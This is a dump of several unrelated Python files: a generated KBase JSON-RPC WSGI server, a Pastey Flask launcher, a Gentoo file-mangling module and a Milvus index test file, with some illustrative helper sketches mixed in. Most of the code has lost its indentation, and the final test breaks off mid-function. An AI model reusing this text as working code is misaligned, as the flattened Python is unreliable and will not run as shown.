def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'jcatlett_ContigFilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_jcatlett_ContigFilter.filter_contigs,
name='jcatlett_ContigFilter.filter_contigs',
types=[dict])
self.method_authentication['jcatlett_ContigFilter.filter_contigs'] = 'required'
self.rpc_service.add(impl_jcatlett_ContigFilter.filter_contigs_max,
name='jcatlett_ContigFilter.filter_contigs_max',
types=[dict])
self.method_authentication['jcatlett_ContigFilter.filter_contigs_max'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"jcatlett_ContigFilter but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening
# on port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, start the server on localhost on a system-assigned port in the
    main thread. Execution of the main thread stays in the server main loop
    until interrupted. To run the server in a separate process, and thus allow
    the stop_server method to be called, set newprocess=True. This also allows
    the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
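# --- Illustrative sketch (not part of the generated server code) ---
# start_server()/stop_server() are meant for test harnesses: with
# newprocess=True the WSGI app runs in a child process and the chosen port is
# returned so a client can be pointed at http://localhost:<port>. The helper
# below is a hypothetical usage example only and is never called.
def _demo_start_stop():
    port = start_server(host='localhost', port=0, newprocess=True)
    try:
        print "Test server listening on port %s" % port
        # ... issue JSON-RPC requests against the server here ...
    finally:
        stop_server()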
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
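# --- Illustrative sketch (not part of the generated server code) ---
# process_async_cli() reads a JSON-RPC style request from a file, dispatches
# it to the registered service method, and writes the response to the output
# path, returning 500 if the call produced an error. The helper below is a
# hypothetical example of preparing such an input file; the file names and
# the parameter values are made up for illustration only, and it is not called.
def _demo_async_cli_call():
    request = {'method': 'jcatlett_ContigFilter.filter_contigs',
               'params': [{'workspace_name': 'my_workspace',
                           'assembly_input_ref': 'my_assembly',
                           'min_length': 500}],
               'version': '1.1'}
    with open('async_input.json', 'w') as f:
        f.write(json.dumps(request))
    return process_async_cli('async_input.json', 'async_output.json', None)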
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
app.py
|
from flask import Flask, render_template, request, redirect, abort
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from os import environ
from distutils.util import strtobool
from threading import Thread
pastey_version = "0.3"
loaded_config = {}
loaded_themes = []
app = Flask(__name__)
limiter = Limiter(
app,
key_func=get_remote_address
)
from pastey import config, common, routes, functions
# Check environment variable overrides
config.data_directory = environ["PASTEY_DATA_DIRECTORY"] if "PASTEY_DATA_DIRECTORY" in environ else config.data_directory
config.listen_address = environ["PASTEY_LISTEN_ADDRESS"] if "PASTEY_LISTEN_ADDRESS" in environ else config.listen_address
config.listen_port = environ["PASTEY_LISTEN_PORT"] if "PASTEY_LISTEN_PORT" in environ else config.listen_port
config.use_whitelist = bool(strtobool(environ["PASTEY_USE_WHITELIST"])) if "PASTEY_USE_WHITELIST" in environ else config.use_whitelist
config.restrict_pasting = bool(strtobool(environ["PASTEY_RESTRICT_PASTING"])) if "PASTEY_RESTRICT_PASTING" in environ else config.restrict_pasting
config.restrict_raw_pasting = bool(strtobool(environ["PASTEY_RESTRICT_RAW_PASTING"])) if "PASTEY_RESTRICT_RAW_PASTING" in environ else config.restrict_raw_pasting
config.guess_threshold = float(environ["PASTEY_GUESS_THRESHOLD"]) if "PASTEY_GUESS_THRESHOLD" in environ else config.guess_threshold
config.recent_pastes = int(environ["PASTEY_RECENT_PASTES"]) if "PASTEY_RECENT_PASTES" in environ else config.recent_pastes
config.whitelist_cidr = environ["PASTEY_WHITELIST_CIDR"].split(",") if "PASTEY_WHITELIST_CIDR" in environ else config.whitelist_cidr
config.blacklist_cidr = environ["PASTEY_BLACKLIST_CIDR"].split(",") if "PASTEY_BLACKLIST_CIDR" in environ else config.blacklist_cidr
config.behind_proxy = bool(strtobool(environ["PASTEY_BEHIND_PROXY"])) if "PASTEY_BEHIND_PROXY" in environ else config.behind_proxy
config.default_theme = environ["PASTEY_DEFAULT_THEME"] if "PASTEY_DEFAULT_THEME" in environ else config.default_theme
config.purge_interval = int(environ["PASTEY_PURGE_INTERVAL"]) if "PASTEY_PURGE_INTERVAL" in environ else config.purge_interval
config.force_show_recent = bool(strtobool(environ["PASTEY_FORCE_SHOW_RECENT"])) if "PASTEY_FORCE_SHOW_RECENT" in environ else config.force_show_recent
config.ignore_guess = environ["PASTEY_IGNORE_GUESS"].split(",") if "PASTEY_IGNORE_GUESS" in environ else config.ignore_guess
config.show_cli_button = bool(strtobool(environ["PASTEY_SHOW_CLI_BUTTON"])) if "PASTEY_SHOW_CLI_BUTTON" in environ else config.show_cli_button
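# Illustrative sketch (not part of the original app): the block above repeats
# one pattern, "use the environment variable if set, else keep the config
# default", once per setting. A hypothetical generic helper like the one below
# could express the same idea; _override_from_env is not used anywhere here.
def _override_from_env(attr, env_var, cast=str):
    if env_var in environ:
        setattr(config, attr, cast(environ[env_var]))
# e.g. _override_from_env("listen_port", "PASTEY_LISTEN_PORT", int)
#      _override_from_env("use_whitelist", "PASTEY_USE_WHITELIST",
#                         lambda v: bool(strtobool(v)))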
# Main loop
if __name__ == "__main__":
# Print configuration
print("=====================================")
print("Pastey version ", pastey_version)
print("USING THE FOLLOWING CONFIGURATION:")
print("=====================================")
for option in dir(config):
if not option.startswith("__"):
            loaded_config[option] = getattr(config, option)
print(option, ": ", loaded_config[option])
print("=====================================")
# Register error handlers
app.register_error_handler(404, routes.page_not_found)
app.register_error_handler(401, routes.unauthorized)
# Start purging expired pastes thread
purge_thread = Thread(target=functions.purge_expired_pastes, daemon=True)
purge_thread.start()
app.run(host=config.listen_address, port=config.listen_port)
|
mangle.py
|
"""Formatting and file mangling support."""
import functools
import multiprocessing
import os
import re
import signal
import traceback
from datetime import datetime
from snakeoil.cli.exceptions import UserException
from snakeoil.mappings import OrderedSet
copyright_regex = re.compile(
r'^# Copyright (?P<date>(?P<begin>\d{4}-)?(?P<end>\d{4})) (?P<holder>.+)$')
keywords_regex = re.compile(
r'^(?P<pre>[^#]*\bKEYWORDS=(?P<quote>[\'"]?))'
r'(?P<keywords>.*)'
r'(?P<post>(?P=quote).*)$')
def mangle(name):
"""Decorator to register file mangling methods."""
class decorator:
"""Decorator with access to the class of a decorated function."""
def __init__(self, func):
self.func = func
def __set_name__(self, owner, name):
owner._mangle_funcs[name] = self.func
setattr(owner, name, self.func)
return decorator
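# --- Illustrative sketch (not part of the original module) ---
# The @mangle('...') decorator relies on __set_name__: while the class body is
# being created, each decorated method is recorded in the owning class's
# _mangle_funcs registry and then re-bound as a plain function. Note that, as
# written, the registry key is the attribute name used in the class body (the
# inner `name` parameter of __set_name__ shadows the decorator argument). The
# hypothetical, never-called helper below demonstrates that registration.
def _demo_mangle_registry():
    class _DemoMangler:
        _mangle_funcs = {}

        @mangle('strip')
        def _strip(self, data):
            """Trim trailing whitespace and re-add a final newline."""
            return data.rstrip() + '\n'

    # Registered under the attribute name from the class body, i.e. '_strip'.
    return dict(_DemoMangler._mangle_funcs)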
class Mangler:
"""File-mangling iterator using path-based parallelism."""
# mapping of mangling types to functions
_mangle_funcs = {}
def __init__(self, changes, skip_regex=None):
self.jobs = os.cpu_count()
if skip_regex is not None:
changes = (c for c in changes if not skip_regex.match(c.full_path))
self.changes = OrderedSet(changes)
# setup for parallelizing the mangling procedure across files
self._mp_ctx = multiprocessing.get_context('fork')
self._mangled_paths_q = self._mp_ctx.SimpleQueue()
self._current_year = str(datetime.today().year)
# initialize settings used by iterator support
self._runner = self._mp_ctx.Process(target=self._run)
signal.signal(signal.SIGINT, self._kill_pipe)
self._mangled_paths = iter(self._mangled_paths_q.get, None)
# construct composed mangling function
self.composed_func = functools.reduce(
lambda f, g: lambda x: f(g(self, x)), self._mangle_funcs.values(), lambda x: x)
@mangle('EOF')
def _eof(self, change):
"""Drop EOF whitespace and forcibly add EOF newline."""
return change.update(change.data.rstrip() + '\n')
@mangle('keywords')
def _keywords(self, change):
"""Fix keywords order."""
def keywords_sort_key(kw):
return tuple(reversed(kw.lstrip('-~').partition('-')))
lines = change.data.splitlines()
for i, line in enumerate(lines):
if mo := keywords_regex.match(line):
kw = sorted(mo.group('keywords').split(), key=keywords_sort_key)
new_kw = ' '.join(kw)
if not mo.group('quote'):
new_kw = f'"{new_kw}"'
lines[i] = f'{mo.group("pre")}{new_kw}{mo.group("post")}'
break
return change.update('\n'.join(lines) + '\n')
def _kill_pipe(self, *args, error=None):
"""Handle terminating the mangling process group."""
if self._runner.is_alive():
os.killpg(self._runner.pid, signal.SIGKILL)
if error is not None:
# propagate exception raised during parallelized mangling
raise UserException(error)
raise KeyboardInterrupt
def __iter__(self):
# start running the mangling processes
self._runner.start()
return self
def __next__(self):
try:
path = next(self._mangled_paths)
except StopIteration:
self._runner.join()
raise
# Catch propagated, serialized exceptions, output their
# traceback, and signal the scanning process to end.
if isinstance(path, list):
self._kill_pipe(error=path[0])
return path
def _mangle(self, change):
"""Run composed mangling function across a given change."""
if orig_data := change.read():
change = self.composed_func(change)
if change.data != orig_data:
change.sync()
return change
def _run_manglers(self, paths_q):
"""Consumer that runs mangling functions, queuing mangled paths for output."""
try:
for change in iter(paths_q.get, None):
if mangled_change := self._mangle(change):
self._mangled_paths_q.put(mangled_change.path)
except Exception: # pragma: no cover
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
self._mangled_paths_q.put([tb])
def _run(self):
signal.signal(signal.SIGINT, signal.SIG_DFL)
os.setpgrp()
paths_q = self._mp_ctx.SimpleQueue()
pool = self._mp_ctx.Pool(self.jobs, self._run_manglers, (paths_q,))
pool.close()
# queue paths for processing
for change in self.changes:
paths_q.put(change)
# notify consumers that no more work exists
for i in range(self.jobs):
paths_q.put(None)
pool.join()
# notify iterator that no more results exist
self._mangled_paths_q.put(None)
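# --- Illustrative sketch (not part of the original module) ---
# Mangler._keywords() sorts KEYWORDS entries with a key that strips any
# leading '-'/'~' marker and orders primarily by the part after the first
# '-' (empty for plain arches), so e.g. 'amd64' and '-sparc' sort before
# '~amd64-linux'. The hypothetical helper below reproduces that key on a
# sample ebuild line; it is only a demonstration and is never called.
def _demo_keywords_sort():
    def keywords_sort_key(kw):
        # same key as the nested function inside Mangler._keywords above
        return tuple(reversed(kw.lstrip('-~').partition('-')))

    line = 'KEYWORDS="~x86 amd64 ~amd64-linux -sparc"'
    mo = keywords_regex.match(line)
    kw = sorted(mo.group('keywords').split(), key=keywords_sort_key)
    # -> 'amd64 -sparc ~x86 ~amd64-linux'
    return ' '.join(kw)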
class GentooMangler(Mangler):
"""Gentoo repo specific file mangler."""
_mangle_funcs = Mangler._mangle_funcs.copy()
@mangle('copyright')
def _copyright(self, change):
"""Fix copyright headers and dates."""
lines = change.data.splitlines()
if mo := copyright_regex.match(lines[0]):
groups = mo.groupdict()
if groups['begin'] is None and groups['date'] != self._current_year:
# use old copyright date as the start of date range
date_range = f"{groups['date']}-{self._current_year}"
lines[0] = re.sub(groups['date'], date_range, lines[0])
else:
lines[0] = re.sub(mo.group('end'), self._current_year, lines[0])
lines[0] = re.sub('Gentoo Foundation', 'Gentoo Authors', lines[0])
return change.update('\n'.join(lines) + '\n')
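# --- Illustrative sketch (not part of the original module) ---
# GentooMangler._copyright() rewrites the first header line: a single old year
# becomes a range ending in the current year, an existing range only has its
# end year bumped, and 'Gentoo Foundation' becomes 'Gentoo Authors'. The
# hypothetical, never-called helper below applies the same steps to one line.
def _demo_copyright(line='# Copyright 2017 Gentoo Foundation'):
    current_year = str(datetime.today().year)
    if mo := copyright_regex.match(line):
        groups = mo.groupdict()
        if groups['begin'] is None and groups['date'] != current_year:
            # single year in the past -> turn it into a range
            line = re.sub(groups['date'], f"{groups['date']}-{current_year}", line)
        else:
            # existing range (or current year) -> refresh the end year
            line = re.sub(mo.group('end'), current_year, line)
    # e.g. '# Copyright 2017-<current year> Gentoo Authors'
    return re.sub('Gentoo Foundation', 'Gentoo Authors', line)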
|
test_index.py
|
"""
For testing index operations, including `create_index`, `describe_index` and `drop_index` interfaces
"""
import logging
import pytest
import time
import pdb
import threading
from multiprocessing import Pool, Process
import numpy
import sklearn.preprocessing
from milvus import IndexType, MetricType
from utils import *
nb = 6000
dim = 128
index_file_size = 10
vectors = gen_vectors(nb, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
BUILD_TIMEOUT = 300
nprobe = 1
tag = "1970-01-01"
NLIST = 4046
INVALID_NLIST = 100000000
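# --- Illustrative sketch (not part of the original test module) ---
# The vectors above are L2-normalized row by row, so each vector has unit
# length and searching with a vector already in the collection yields a top
# hit at distance 0.0, which several tests below assert. The hypothetical
# helper shows the equivalent plain-numpy normalization for a single vector;
# the tests do not use it.
def _demo_l2_normalize(vec):
    vec = numpy.asarray(vec, dtype=float)
    norm = numpy.linalg.norm(vec)
    # guard against an all-zero vector (norm would be 0)
    return (vec / norm).tolist() if norm > 0 else vec.tolist()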
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface
        method: create collection and create index without adding any vectors
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
connect.flush()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, collection):
'''
target: test create index without connection
        method: create index on a collection while disconnected
expected: raise exception
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
assert len(result) == len(query_vecs)
logging.getLogger().info(result)
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_multithread(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
threads_num = 8
threads = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
t = threading.Thread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_multithread_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
